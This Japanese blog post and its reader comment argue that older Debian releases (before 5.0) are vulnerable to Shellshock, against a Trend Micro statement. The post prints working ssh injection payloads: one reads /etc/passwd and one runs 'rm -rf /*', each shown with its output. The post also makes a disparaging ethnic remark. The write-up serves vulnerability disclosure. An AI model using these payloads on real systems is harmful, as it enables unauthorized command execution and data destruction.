トレンドマイクロ『DebianはShellShockの影響無し』=>v5.0未満は危険

セキュリティ調査の依頼があったのでネタに。

◇bashに存在する「Shellshock」脆弱性についての注意喚起 (Trendmicro)
脆弱性「Shellshock」を利用した新たな攻撃を確認。SMTPサーバを狙う | トレンドマイクロ セキュリティブログ

bash の ShellShock の脆弱性、CVE-2014-6271、CVE-2014-7169 について、調査依頼を受けたのですが、
ターゲットが、debian だったんです。

dash や Debian といった bash を標準のシェルとして使っていないサーバは脆弱ではありません

で、トレンドマイクロによると、『Debia は ash や shなので影響を受けない』とのこと
※ ただし、『Debian(Ubuntu)環境の Postfix ディストリビューション標準では、”main.cf” で「procmail」を「mailbox_command」に設定するので「Shellshock」を利用した攻撃に脆弱となります』と書いてあります。

まぁ、念のためテストコードを試してみたところ・・・脆弱性ありに!?

というわけで実証コードを試してみることになりました。

対象のサーバーは通常ログインすることはできないようになっていて、公開鍵を利用する方法しかアクセス方法が無いので、中々実証コードが無くてちょっと困ったのですが、いろいろネット上に公開されている方法を 組み合わせてみたところできたという感じ。

実証コードはこんな感じ

ssh -F config -i rsa net1 remote_host '(){ ignored; }; /bin/cat /etc/passwd;ls -la /bin'

実行結果

debug1: channel 3: new [port listener]
debug1: channel 4: new [client-session]
debug1: Entering interactive session.
debug1: Sending command: localhost (){ ignored; }; /bin/cat /etc/passwd;ls -la /bin
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
man:x:6:100:man:/var/cache/man:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
debug1: client_input_channel_req: channel 4 rtype exit-status reply 0
drwxr-xr-x    2 root     root         1024 Dec 25 10:21 .
drwxr-xr-x   19 root     root          420 Dec 25 10:21 ..

ちなみに実行権限はログインユーザーのままなので

ssh -F config -i rsa net1 remote_host '(){ ignored; }; /bin/rm -rf /*'

とかにしても、一部のファイルを除いて削除されず

実行結果

debug1: channel 3: new [port listener]
debug1: channel 4: new [client-session]
debug1: Entering interactive session.
debug1: Sending command: localhost (){ ignored; }; /bin/cat /etc/passwd;ls -la /bin
rm: unable to remove `/*': Permission denied
debug1: client_input_channel_req: channel 4 rtype exit-status reply 0
drwxr-xr-x    2 root     root         1024 Dec 25 10:21 .
drwxr-xr-x   19 root     root          420 Dec 25 10:21 ..

のようになった。

どういうことかというと、bash が標準じゃなくなったのは debian の lenny (5.0)からなんですよね。
つまり woody (3.0), sarge (3.1), etch (4.0) はアウト。

Debianのwoody (3.0), sarge (3.1), etch (4.0), lenny (5.0)でbashの脆弱性問題に対応する手法 | OSAKANA TAROのメモ帳
いくらもう、サポートされてないとはいえ、これ書かずに通常の Debian は影響受けないなんて書いちゃうなんて、さすがトレンドマイクロさん! そういうのが中華クォリティだって言うんだよ…。

|。・ω・)。o (一般ユーザーは使ってなくても、古い組み込み向けのハードウェアには使われてるんだぜ ? )

Debian Almquist shell - Wikipedia

1. Debian 5.0 (コードネーム: lenny)からはデフォルトの/bin/shをこのシェルに置き換えた
2. /bin/sh/bin/bash 又は /bin/dash
の直接のシンボリックリンク

他の脆弱性と組み合わせると特権を昇格できる可能性があるのでとっても危険だね・ω・

そろそろ、脆弱性情報が出てから4ヶ月、いまだに直ってないところは注意が必要です。

結論: 認証方法に関係なく、SSHで認証する方法さえあれば Force_Command を迂回して、コマンドが実行できてしまう

bashの脆弱性(CVE-2014-6271) #ShellShock の関連リンクをまとめてみた - piyolog

おすすめ

1件の返信

  1. M_M より:
    2015年2月12日 6:13 PM

    指摘された箇所は、どうも原本の英語をレイアウトに収まるように要約する時に間違えたらしい。
    ttp://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-shellshock.pdf
     
    “Those that do not are not vulnerable such as dash on Debian.”
    まぁ、これとは別にPDFのP9にある「OSと影響のないバージョン」の表には
    Debian
     4.1-3+deb6u2 (squeeze (lts))
     4.2+dfsg-0.1+deb7u3 (wheezy(security))
     4.3-9.2 (sid)
    とありますが、文章との順番がねぇ。

    返信

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です